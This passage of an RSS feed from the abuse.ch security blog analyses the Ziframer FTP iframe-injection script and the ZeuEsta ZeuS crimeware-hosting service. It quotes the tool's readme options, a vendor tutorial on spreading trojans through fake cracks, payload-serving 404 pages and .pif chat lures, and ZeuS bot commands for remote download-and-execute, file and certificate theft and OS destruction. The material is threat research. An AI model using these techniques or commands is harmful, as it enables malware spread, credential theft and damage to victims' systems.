<p>In the file &#8220;iframe.txt&#8221; the attacker can define the (JavaScript- or HTML-) code he would like to inject:</p>
<p><center><a href="http://www.abuse.ch/wp-content/maliciousiframe.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/maliciousiframe-300x169.jpg" alt="Malicious Iframe" title="Malicious Iframe" width="300" height="169" class="aligncenter size-medium wp-image-1751" /></a></center></p>
<p>The cyberciminal has also the possibility to set a <em>timeout</em>, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt):</p>
<p><center><a href="http://www.abuse.ch/wp-content/validinftpaccounts.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/validinftpaccounts.jpg" alt="validinftpaccounts" title="validinftpaccounts" width="165" height="144" class="aligncenter size-full wp-image-1759" /></a></center></p>
<p>Last but not least the attacker has to define where he wants to put the malicious code. He has the following options:</p>
<div class="codesnip-container" ><em>start page</em> &#8211; Inject the code at the top of the page<br />
<em>end</em> &#8211; Inject the code at the bottom of the page<br />
<em>change</em> &#8211; Replace a text or a string in the page with the malicious code<br />
<em>check</em> &#8211; Check if the malicious code is already on the page</div>
<p>Now the cybercriminal has just to press the &#8220;START&#8221; button to run the script. The Iframer script will now get through the FTP accounts and inject the malicious code which is defined in the file &#8220;iframe.txt&#8221; (see <a href="http://img369.imageshack.us/img369/8071/ziframerez7.png" target="_blank">this one</a>).</p>
<p>To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in russian and english.</p>
<p><strong>Content of readme.html (english):</strong></p>
<div class="codesnip-container" >This script is designed to test the FTP accounts on the validity, insert the code into files on the FTP.</p>
<p><strong>[Features]</strong><br />
[*] Console and Web interface<br />
[*] Stabilno runs under Windows and Nix BSD<br />
[*] Check for validity ftp<br />
[*] Paste the Code (at the beginning or end of file. Or a full overwrite the file to your text &#8211; defeys)<br />
[*] Strange Komentirovanie iframe&#8217;ov<br />
[*] Convenience logs [*] All akki (valid \ invalid) remain in the database.<br />
[*] The names of files, to insert the code can be set regExp&#8217;om, such as index \ .(.*)[_ b] or [_b ](.*). php | html | asp | htm.<br />
[*] It takes on all the folders on the site.<br />
[*] Function update replaces your old code to the new (for example, changed the addresses fryma)</p>
<p><strong>[Run]</strong><br />
[!] Recommend to use the console interface</p>
<p><em>Windows</em><br />
Open a console (Start-&gt; Run-&gt; cmd)<br />
Write to the path to php.exe for example c: \ php \ php.exe<br />
then write the path to the script (zifr.php)<br />
For example the so-c: \ php \ php.exe D: \ soft \ ziframer \ zifr.php<br />
the script will run and display a certificate.</p>
<p><em>* NIX</em><br />
Open the console / ssh<br />
Write to php then write the path to the script (zifr.php)<br />
For example the so-php / home / user / soft / ziframer / zifr.php<br />
the script will run and display a certificate.</p>
<p><strong>[Options]</strong><br />
-file    -f Path to the file to your FTP<br />
-code    -c path to a file with code introduced<br />
-inject  -i Where vstavlt code three options<br />
start &#8211; top of the page<br />
end &#8211; in the bottom of the page<br />
change &#8211; replace the text in the page code<br />
-time    -t Timeout for connecting to the FTP<br />
-del     -d With this option chyuzhye ifremy komentiruyutsya<br />
-update  -u Update your code with this option, the script ishet inserted your code and replaces it with a new<br />
-good    -g file where badat skladyvatsya working FTP<br />
-bad     -b file where badat skladyvatsya not working FTP<br />
-hide    -h If you enable this option, your code will not markerovatsya but you will not be able to use the function update<br />
-restore -r Continue from the last FTP if you had not had time to do the whole list you can start from where you stopped</div>
<p><strong>Conclusion</strong></p>
<p>The <em>Ziframe</em> script is very simple an cheap. Even a n00b is able to use it. </p>
<p>It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one shows how infection vectors are more and more shifted from E-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market.</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=1739' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=1739&amp;title=An Iframer for Dummies' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=1739&amp;title=An Iframer for Dummies' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=1739' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=1739&amp;title=An Iframer for Dummies' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=1739&amp;bm_description=An Iframer for Dummies' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=1739&amp;t=An Iframer for Dummies' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=1739&amp;title=An Iframer for Dummies' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=1739' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=1739#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/PWJv33j3QvLQF4RekBhHchad-zU/0/da"><img src="http://feedads.g.doubleclick.net/~a/PWJv33j3QvLQF4RekBhHchad-zU/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/PWJv33j3QvLQF4RekBhHchad-zU/1/da"><img src="http://feedads.g.doubleclick.net/~a/PWJv33j3QvLQF4RekBhHchad-zU/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/3QfPVOZuJpA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=1739</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=1739</feedburner:origLink></item>
		<item>
		<title>ZeuEsta: ZeuS cybercrime hosting with SPack</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/aZaCcerQhVw/</link>
		<comments>http://www.abuse.ch/?p=1662#comments</comments>
		<pubDate>Tue, 28 Jul 2009 10:15:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[crimeware]]></category>
		<category><![CDATA[El Fiesta]]></category>
		<category><![CDATA[SPack]]></category>
		<category><![CDATA[wsnpoem]]></category>
		<category><![CDATA[Zbot]]></category>
		<category><![CDATA[ZeuEsta]]></category>
		<category><![CDATA[ZeuS]]></category>
		<category><![CDATA[zeus-services.info]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=1662</guid>
		<description><![CDATA[Recently I came across a web page which is selling ZeuS as a service. That&#8217;s not very new, but I decided to write about it anyway since the page looks quite interesting.
But first of all: What is ZeuEsta?
ZeuEsta comes from the two words ZeuS and El Fiesta. ZeuEsta is a mix of the ZeuS crimeware [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I came across a web page which is selling ZeuS as a service. That&#8217;s not very new, but I decided to write about it anyway since the page looks quite interesting.</p>
<p>But first of all: What is ZeuEsta?<br />
<strong>ZeuEsta</strong> comes from the two words <strong>ZeuS</strong> and <strong>El Fiesta</strong>. ZeuEsta is a mix of the <em>ZeuS crimeware</em> and the <em>El Fiesta Exploit Kit</em>. However, since April 17 2009 ZeuEsta is no longer sold with the El Fiesta Exploit Kit, but now in combination with <em>SPack Exploit Kit</em>:</p>
<div class="codesnip-container" >17/5/2009 &#8211; Upgrade<br />
ZeuEsta is now a mix of ZeuS and SPack not ZueS and Fiesta.</div>
<p>The page which I came awar is selling ZeuEsta as a service. The page seems to be very informative. You can see how many <em>User Slots</em> are available, how many of them are already assigned and which version of <em>ZeuEsta</em> is beeing used:</p>
<div class="codesnip-container" >Load Status:</p>
<p>Current Version: 6.0<br />
User Slots Filled: 4/6</p></div>
<p>Additionally you can see on the page that the ZeuEsta hosting service is already running since November 2008.</p>
<p><center><a href="http://www.abuse.ch/wp-content/zeuesta_hosting.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/zeuesta_hosting-300x228.jpg" alt="ZeuEsta Cybercrime hosting" title="ZeuEsta Cybercrime hosting" width="300" height="228" class="aligncenter size-medium wp-image-1681" /></a></center></p>
<p>The web page which is promoting / selling this services is called <em>zeus-services.info</em> and is hosted at AltaVista (Yahoo):</p>
<div class="codesnip-container" >dig zeus-services.info</p>
<p>;; QUESTION SECTION:<br />
;zeus-services.info.            IN      A</p>
<p>;; ANSWER SECTION:<br />
zeus-services.info.     1200    IN      A       <strong>216.39.57.104</strong></p>
<p>OrgName:    AltaVista Company<br />
OrgID:      ALTAVI-1<br />
Address:    701 First Ave<br />
City:       Sunnyvale<br />
StateProv:  CA<br />
PostalCode: 94089<br />
Country:    US</p>
<p>NetRange:   216.39.48.0 &#8211; 216.39.63.255<br />
CIDR:       216.39.48.0/20<br />
NetName:    NETBLK-INTERNET-BLK-1-AV<br />
NetHandle:  NET-216-39-48-0-1<br />
Parent:     NET-216-0-0-0-0<br />
NetType:    Direct Assignment<br />
NameServer: NS1.YAHOO.COM<br />
NameServer: NS2.YAHOO.COM<br />
NameServer: NS3.YAHOO.COM<br />
NameServer: NS4.YAHOO.COM<br />
NameServer: NS5.YAHOO.COM</p></div>
<p>Here is the whois output of <em>zeus-services.info</em>:</p>
<div class="codesnip-container" >Domain ID:D28733635-LRMS<br />
Domain Name:ZEUS-SERVICES.INFO<br />
Created On:09-Jun-2009 17:06:38 UTC<br />
Last Updated On:10-Jun-2009 02:04:45 UTC<br />
Expiration Date:09-Jun-2011 17:06:38 UTC</p>
<p>Sponsoring Registrar:Melbourne IT Ltd. (R141-LRMS)<br />
Status:CLIENT TRANSFER PROHIBITED<br />
Status:TRANSFER PROHIBITED</p>
<p>Registrant ID:A124447136247250<br />
Registrant Name:Narayan Pradeep<br />
Registrant Organization:Pradeep<br />
Registrant Street1:26 Wangsa Setia 4 Wangsa Melaw<br />
Registrant Street2:<br />
Registrant Street3:<br />
Registrant City:Kuala Lumpur<br />
Registrant State/Province:selangor<br />
Registrant Postal Code:53300<br />
Registrant Country:MY</p></div>
<p>There is a Question&#038;Answers section on the page which describes how ZeuEsta works:</p>
<div class="codesnip-container" >ZeuEsta works by silently redirecting traffic from websites to your ZeuEsta exploit page.</div>
<p>There are also some features of ZeuEsta listed on the page like the fact that ZeuEsta is exploiting IE, Firefox, Opera and Adobe Reader 6/7/8, logging outgoing browser connections (HTTP/HTTPS/FTP), stealing browser cookies and accessing all sites defined in the config file (e.g. used for stealing banking information and Credit Cards).</p>
<p>Much more interessting as the features of ZeuEsta is the price model of the service and what a cybercriminal gets for his money when he buys <em>ZeuEsta Hosting</em>:</p>
<div class="codesnip-container" >ZeuEsta is $600 USD. (Zeus 1.2.4.6 + Install on the server + 1 month free hosting). Hosting costs $100 per month. We accept payment by WU (westernunion) or LR (libertyreserve).<br />
* Existing customers can also pay via Western Union but we do not accept it for first time customers.<br />
[...]<br />
After payment confirmation we will send you the following:<br />
* 1 Months access to members area<br />
* User/Password of your ZeuEsta Admin Panel to view logs, online bots, exploit stats, issue commands and so on.<br />
* A specially crafted iframe to add to remote websites to generate traffic for your panel to start exploiting.<br />
* Support on how to generate traffic, how to hide iframes and how to spread your bot.<br />
* Weekly updated undetected binaries.<br />
* Everything else that is listed above in features</div>
<p>As you can see above, the vendor of the service is offering the cybercriminals a <em>weekly update of undetected binaries</em> to spread the ZeuS bot. But what happens when the ZeuEsta hosting sevice runs out and the cybercriminal fails  to pay for the service for another month? Well, the vendor of the ZeuEsta will just sell the ZeuS botnet to another customer:</p>
<div class="codesnip-container" >After that 2 weeks is over your bots will be updated / Sold off to another client and be gone for good.</div>
<p>If the cybercriminal is still not feeling confident, the vendor offers him a free demo of the ZeuEsta hosting service.</p>
<p>There is also a tutorial on the page which is describing different ways to spread the ZeuS bot:</p>
<div class="codesnip-container" ><strong>Filename: Spread bots.txt</strong><br />
In this tutorial/guide, I am going to tell you ways to spread your bot/trojan.</p>
<p>1. Torrents<br />
This is pretty easy, and pretty successful.</p>
<p>First you need a torrent client, I use uTorrent, because it&#8217;s the easiest.</p>
<p>Once you get your torrent client, make a folder full of .zip files with names of popular programs (e.g. Kaspersky 2009 Crack.zip) and put your bot/trojan inside.</p>
<p>Now you need to create the torrents.<br />
Open uTorrent (or your other torrent client), and click File|Create New Torrent&#8230; Then add one of your fake programs (The Kaspersky 2009 Crack.zip or what ever).</p>
<p>Now you need to add trackers.</p>
<p>Code: Select all<br />
    Here are some good trackers you can use:</p>
<p>http://open.tracker.thepiratebay.org/announce</p>
<p>http://www.torrent-downloads.to:2710/announce</p>
<p>http://denis.stalker.h3q.com:6969/announce</p>
<p>    udp://denis.stalker.h3q.com:6969/announce</p>
<p>http://www.sumotracker.com/announce</p>
<p>Don&#8217;t check private, but do check start seeding.</p>
<p>Now click Create and save as..</p>
<p>Once you save, go to thepiratebay.org, and register, and click upload torrent.</p>
<p>Do this too all of your fake cracks or programs.</p>
<p>You can also get programs or stuff that people might want, and just bind your bot/trojan to it then create the torrent that way (takes longer, but more people might download it).</p>
<p>2. Crack Request forums<br />
This way is pretty easy and is pretty effective.</p>
<p>First get hosting that allows custom 404 pages (I suggest getting a .info domain from godaddy (only $0.99), because you can upload viruses, and have custom error 404 pages.</p>
<p>Once you get this, upload your bot/trojan to you hosting (e.g. &#8220;www.freefileupload247.info/files/bot.exe&#8221;), then make the custom 404 page &#8220;www.freefileupload247.info/files/bot.exe&#8221; (or what ever you uploaded you bot/trojan as).</p>
<p>Then no matter what url someone goes to on your site, it will download your bot/trojan<br />
(like &#8220;www.freefileupload247.info/files/34736745/asdfasdg.exe&#8221; or &#8220;www.freefileupload247.info/a.exe&#8221; or even better &#8220;www.freefileupload247.info/files/2765345/Kaspersky.2009.Crack.exe&#8221;)</p>
<p>Then find a software cracking forum that has a subform for &#8220;Crack Requests&#8221;.<br />
Then you click on a whole bunch of the requests and reply to all of them with something like this:</p>
<p>I found the keygen for it:<br />
&#8220;http://www.freefileupload247.info/files/234572/Nero.9.Keygen.exe&#8221;<br />
That is a good way of doing it.</p>
<p>3. Chatrooms<br />
Here is another good way.<br />
Go on some chatroom somewhere and put your name as something like Jenna247. Then PM a bunch of guys with something like this:</p>
<p>Heyy my name is Jenna asl?<br />
You want to see a picture of me?<br />
&#8220;http://www.freefileupload247.com/pictures/2047529/Me_at_sleepover.pif&#8221;<br />
I don&#8217;t know if you can open it, I&#8217;m on a mac.</p>
<p>If you rename a .exe file to a .pif, it will run just as the .exe does, so with your custom 404, if they go to your server /anything.pif, if will download your bot/trojan) And a .pif file looks like it could be a picture >:D</p>
<p>You could do this to a bunch of people at once, or make your bot do it.</p>
<p>4. Email<br />
Not that easy, but could be good.</p>
<p>Make your bot/trojan get a list of all the zombie&#8217;s (infected computer) contacts, and have it send out an email from a random email address (such as SmithJenna247@yahoo.com) with something like this:</p>
<p>Hey it&#8217;s Jenna, I don&#8217;t think you remember me, but we met a while ago.<br />
Here is a picture of us: &#8220;http://www.freefileuploads247.com/pictures/342772/2008_36327.pif&#8221;</p>
<p>Then if someone from their contacts downloads it, it will send to to all their contacts and so on.</p>
<p>I hope this tutorial/guide helped you, if you have anything to add, please do so.</p>
<p>All Rights Reserved © 2008 &#8211; 2009 by www.Zeus-ServiceS.Info</p></div>
<p>Another File is describing the <em>ZeuS Commands</em>:</p>
<div class="codesnip-container" ><strong>Filename: Zeus Commands.txt</strong><br />
Zeus commands are available now:</p>
<p>Command and its parameters are written on the rules of the configuration file</p>
<p>Quote:block_fake [URL-mask] &#8211; call blocking any URL-redirect, URL-mask which will be treated under the URL-mask this team.</p>
<p>unblock_fake [mask] &#8211; from a list of blocked URL-redirects will remove all URL-masks, which will be treated under the URL-mask of this team.</p>
<p>block_url &#8211; call blocking any URL, which will coincide with the URL-mask of this team.</p>
<p>unblock_url- from the list of blocked URL will remove all URL-masks, which will be treated under the URL-mask of this team.</p>
<p>rexec &#8220;http://taarar.com/tvoj.exe&#8221; &#8211; upload exe<br />
rexeci &#8220;http://taarar.com/tvoj.exe&#8221; &#8211; f &#8211; ignore version of config<br />
lexec &#8220;C: \ windows \ system32 \ calc.exe&#8221; &#8211; will open a calculator for this user (for example, the calculator, can open any other)<br />
resetgrab &#8211; re-purification Cookies, protect storage<br />
getmff &#8211; get solfiles with bots<br />
delmff &#8211; clear solfiles<br />
getcert &#8211; to obtain certificates of all hranilish<br />
addsff &#8220;*. doc&#8221; &#8211; get all the evidentiary files Bot<br />
getfile &#8220;kkk.doc&#8221; &#8211; receive a file with the bot</p>
<p>upcfg [url] &#8211; after receiving the command boat immediately try to download a configuration file in a standard URL.<br />
Quote:kos &#8211; incapacitate OS, namely grip branches HKEY_CURRENT_USER registry and / or HKEY_LOCAL_MACHINE.<br />
If you have sufficient privileges &#8211; fly to &#8220;blue screen&#8221;, in other cases creates the brakes. Following these steps, loading OS will not be possible!</p>
<p>All Rights Reserved © 2008 &#8211; 2009 by www.Zeus-ServiceS.Info</p></div>
<p>While I was doing some research in this case I came accross a forum topic where some people talked about ZeuEsta. There are some interessting posts concering this topic like that the original price for ZeuEsta is about $150 (zeus-services.info is selling it for 600$). Another one says:</p>
<div class="codesnip-container" >[...] I got a botnet with 800 zombies (mostly USA) <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </div>
<p>In a another forum the vendor of ZeuEsta hosting says:</p>
<div class="codesnip-container" >ZeuEsta Hosting is now back!</p>
<p>ZeuEsta Hosting has been around since November 2008, we have had a 90+ day downtime to stop google and firefox listing our domains as malicious and are ready to go again.[...]</p></div>
<p>And later:</p>
<div class="codesnip-container" >Domain has been suspended, new domain up over the next few weeks.</div>
<p>Now he is selling the service using the two domains <em>zeus-services.info / zeus-service.blogspot.com</em>.</p>
<p>Last but not least there are some contact informations on the page:</p>
<div class="codesnip-container" >YIM: zeus.services or email us at info@zeus-services.info</div>
<p><strong>Conclusion</strong></p>
<p>It&#8217;s interessting to see that two crimeware kits are beeing combined (ZeuS and SPack). It seems that there is a price competition in the criminal underground and that the price for the same crimeware kit can vary from just a few dollars up to hundreds of dollars and more. </p>
<p>But the six slots for customers which the <em>ZeuEsta hosting service</em> offers is just a drop in a bucket: There are currently more than 200 well known hosts around the globe which are spreading the ZeuS trojan and/or acting as Command&#038;Control Server (C&#038;C) for ZeuS infected bots (see <a href="https://zeustracker.abuse.ch/monitor.php?filter=filesonline" target="_blank">abuse.ch ZeuS Tracker</a>). According to <a href="http://www.damballa.com" target="_blank">Damballa</a>, ZeuS has with <strong>3.6 million infected computers</strong> the most infected computers in United States (Source: <a href="http://www.networkworld.com/news/2009/072209-botnets.html" target="_blank">Network World: America&#8217;s 10 most wanted botnets</a>).</p>
<p>During my reasearch I came across some post where vendors of such crimeware services / crimeware kits are complaining about DDoS attacks againts their site(s) where they are selling their services / crimeware kits. Obviouslye criminals are not only attacking legitim websites (like abuse.ch) using DDoS attacks, but are also fighting against each other.</p>
<p>Cybercrime is a dirty business &#8211; Keep your hands off <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>Further reading</strong></p>
<ul>
<li><a href="http://ddanchev.blogspot.com/2008/12/zeus-crimeware-as-service-going.html" target="_blank">Dancho Danchev: Zeus Crimeware as a Service Going Mainstream</a></li>
</ul>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=1662' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=1662&amp;title=ZeuEsta: ZeuS cybercrime hosting with SPack' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=1662&amp;title=ZeuEsta: ZeuS cybercrime hosting with SPack' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=1662' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=1662&amp;title=ZeuEsta: ZeuS cybercrime hosting with SPack' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=1662&amp;bm_description=ZeuEsta: ZeuS cybercrime hosting with SPack' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=1662&amp;t=ZeuEsta: ZeuS cybercrime hosting with SPack' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=1662&amp;title=ZeuEsta: ZeuS cybercrime hosting with SPack' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=1662' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=1662#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/EyJNOH-qBijoDD_2gD3TqosiM3E/0/da"><img src="http://feedads.g.doubleclick.net/~a/EyJNOH-qBijoDD_2gD3TqosiM3E/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/EyJNOH-qBijoDD_2gD3TqosiM3E/1/da"><img src="http://feedads.g.doubleclick.net/~a/EyJNOH-qBijoDD_2gD3TqosiM3E/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/aZaCcerQhVw" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=1662</wfw:commentRss>
		<slash:comments>7</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=1662</feedburner:origLink></item>
	</channel>
</rss>
